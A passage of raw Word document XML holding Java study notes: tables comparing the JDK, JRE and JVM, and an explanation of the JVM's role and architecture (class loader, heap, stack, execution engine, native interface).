            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08211487" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203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VM + Libraries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B203CA" w:rsidRPr="00CE4B95" w14:paraId="2796934B" w14:textId="77777777" w:rsidTr="00726D2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1497D970" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203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rpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="207D5A75" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203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velop + Run Java code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0403F9E6" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203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ly Run Java code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B203CA" w:rsidRPr="00CE4B95" w14:paraId="6AE128A6" w14:textId="77777777" w:rsidTr="00726D2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="569D7A90" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203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cludes Compiler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7273C9BD" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F0F5949" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B203CA" w:rsidRPr="00CE4B95" w14:paraId="41B21258" w14:textId="77777777" w:rsidTr="00726D2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AE14E0E" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203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cludes JVM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="107C62B4" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EE35149" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B203CA" w:rsidRPr="00CE4B95" w14:paraId="6639EC85" w14:textId="77777777" w:rsidTr="00726D2F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="677695FB" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203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o uses it?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B649A1F" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203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velopers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D796C3A" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203C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d-users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5733A978" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B203C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1DA5443">
          <v:rect id="_x0000_i1241" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F943CC" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203C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Bonus: JVM (Java Virtual Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAAD5D5" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55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ecutes the compiled Java bytecode (.class files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DA1570" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55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onverts bytecode into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>machine-specific code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497520FC" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00726D2F" w:rsidP="00B203CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55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latform-independent execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F3F56" w14:textId="77777777" w:rsidR="00726D2F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00726D2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FDF2DA9">
          <v:rect id="_x0000_i1242" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1269BA" w14:textId="1C142DD5" w:rsidR="00102AE6" w:rsidRPr="00CE4B95" w:rsidRDefault="00102AE6" w:rsidP="00102AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="192B4326" w14:textId="77777777" w:rsidR="00272D63" w:rsidRPr="00CE4B95" w:rsidRDefault="00272D63">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc196307573"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain JVM?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="44F880DC" w14:textId="554A333A" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">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Java Virtual Machine (JVM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that runs Java applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C744FE5" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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nk of it as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529B1BF" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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virtual computer that runs your compiled Java bytecode (.class files), not the source code (.java).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B94D703" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AF1B8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5C35BD">
          <v:rect id="_x0000_i1243" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="680953C5" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">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Main Responsibilities of JV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38"/>
        <w:gridCol w:w="5363"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AF1B80" w:rsidRPr="00CE4B95" w14:paraId="1187ECB5" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48DFA9EC" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47869827" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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AF1B80" w:rsidRPr="00CE4B95" w14:paraId="4B07A4F0" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26909BBF" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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ads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14B3A683" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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ads the .class file generated by the Java compiler</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF1B80" w:rsidRPr="00CE4B95" w14:paraId="4A2F8827" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F4F719C" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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erifies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25C6797D" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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hecks bytecode for security and correctness</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF1B80" w:rsidRPr="00CE4B95" w14:paraId="0384292D" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C870E8C" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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ecutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0445C430" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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ecutes the bytecode using the Just-In-Time (JIT) compiler</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF1B80" w:rsidRPr="00CE4B95" w14:paraId="67C6842C" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="002C5E9F" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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anages Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4136A0E0" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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ndles heap, stack, garbage collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45C96932" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AF1B8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865931">
          <v:rect id="_x0000_i1244" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD57B81" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">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JVM Architecture (High-Level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEFE39F" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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lass Loader System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFC29D8" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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ads .class files into JVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DE3091" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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ndles loading, linking, and initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F9F022" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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 Area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7E30CD" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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ores class-level structures (metadata, static variables, method info)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20230A42" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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eap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4D3B06" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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ores objects and instance variables (shared)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDE4618" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5633FCBB" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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ores method frames (local variables, partial results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23736EFF" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ogram Counter (PC) Register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E75F70B" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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oints to the current executing instruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9322A2" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ecution Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA47F2F" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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uns the bytecode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB02237" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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s JIT (Just-In-Time Compiler) for optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221D604A" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ative Method Interface &amp; Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C03B539" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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ables Java to call non-Java (native) code like C/C++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154C2A58" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AF1B8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189C39">
          <v:rect id="_x0000_i1245" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26013542" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">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JVM vs JRE vs JD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9"/>
        <w:gridCol w:w="4525"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AF1B80" w:rsidRPr="00CE4B95" w14:paraId="6650219C" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1764DCCD" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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ponent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13776451" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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AF1B80" w:rsidRPr="00CE4B95" w14:paraId="0EB0B0F9" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B2641A1" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75B07CCD" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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art of JRE, responsible for running Java bytecode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF1B80" w:rsidRPr="00CE4B95" w14:paraId="0C78D5A8" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B81F489" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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RE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="338EE876" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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cludes JVM + libraries to run Java apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF1B80" w:rsidRPr="00CE4B95" w14:paraId="52726484" w14:textId="77777777" w:rsidTr="00021997">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12A938E5" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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DK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00F858C6" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B8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cludes JRE + tools to develop Java apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09870BD3" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AF1B8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62DEE01">
          <v:rect id="_x0000_i1246" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDD63DD" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">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Platform Independence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744CD053" w14:textId="77777777" w:rsidR="00021997" w:rsidRPr="00CE4B95" w:rsidRDefault="00021997" w:rsidP="00AF1B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Java code is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compiled into bytecode</w:t>
      </w:r>
